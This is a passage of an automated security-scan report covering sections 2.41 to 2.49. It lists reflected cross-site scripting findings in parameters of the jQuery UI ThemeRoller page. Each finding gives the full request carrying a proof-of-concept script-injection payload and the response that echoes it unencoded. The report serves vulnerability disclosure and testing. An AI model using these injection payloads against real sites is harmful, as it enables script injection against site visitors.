GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=759d510"><script>alert(1)</script>ecb5ac790e0&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=759d510"><script>alert(1)</script>ecb5ac790e0&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=4
...[SNIP]...

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied, without encoding, into an HTML tag attribute value enclosed in double quotation marks. The payload b5155"><script>alert(1)</script>7fc8fd270e6 was submitted in the bgImgOpacityOverlay parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0b5155"><script>alert(1)</script>7fc8fd270e6&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0b5155"><script>alert(1)</script>7fc8fd270e6&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

2.42. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied, without encoding, into an HTML tag attribute value enclosed in double quotation marks. The payload b5153"><script>alert(1)</script>c40354ad18f was submitted in the bgImgOpacityShadow parameter and was echoed unmodified in the application's response. The response snippet below shows the tail of the sink: the attribute closes with type="text/css" media="all" />, so this is the href of a stylesheet link element and the injected markup lands inside the document head.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0b5153"><script>alert(1)</script>c40354ad18f&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0b5153"><script>alert(1)</script>c40354ad18f&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.43. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied, without encoding, into an HTML tag attribute value enclosed in double quotation marks. The payload 8b38f"><script>alert(1)</script>e88a1ca4744 was submitted in the bgTextureActive parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png8b38f"><script>alert(1)</script>e88a1ca4744&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png8b38f"><script>alert(1)</script>e88a1ca4744&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

2.44. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied, without encoding, into an HTML tag attribute value enclosed in double quotation marks. The payload cea95"><script>alert(1)</script>1eeea06abb0 was submitted in the bgTextureContent parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.pngcea95"><script>alert(1)</script>1eeea06abb0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.pngcea95"><script>alert(1)</script>1eeea06abb0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&
...[SNIP]...

2.45. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied, without encoding, into an HTML tag attribute value enclosed in double quotation marks. The payload 8fc0e"><script>alert(1)</script>8558d7e3ed7 was submitted in the bgTextureDefault parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png8fc0e"><script>alert(1)</script>8558d7e3ed7&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png8fc0e"><script>alert(1)</script>8558d7e3ed7&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=
...[SNIP]...

2.46. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied, without encoding, into an HTML tag attribute value enclosed in double quotation marks. The payload bebe2"><script>alert(1)</script>50e8d52cb34 was submitted in the bgTextureError parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.pngbebe2"><script>alert(1)</script>50e8d52cb34&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.pngbebe2"><script>alert(1)</script>50e8d52cb34&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

2.47. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b224"><script>alert(1)</script>3defc719190 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png1b224"><script>alert(1)</script>3defc719190&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png1b224"><script>alert(1)</script>3defc719190&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffff
...[SNIP]...

2.48. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6094c"><script>alert(1)</script>a35bfbf3e53 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png6094c"><script>alert(1)</script>a35bfbf3e53&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png6094c"><script>alert(1)</script>a35bfbf3e53&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcEr
...[SNIP]...

2.49. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af8d6"><script>alert(1)</script>cb13d41972f was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.pngaf8d6"><script>alert(1)</script>cb13d41972f&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighligh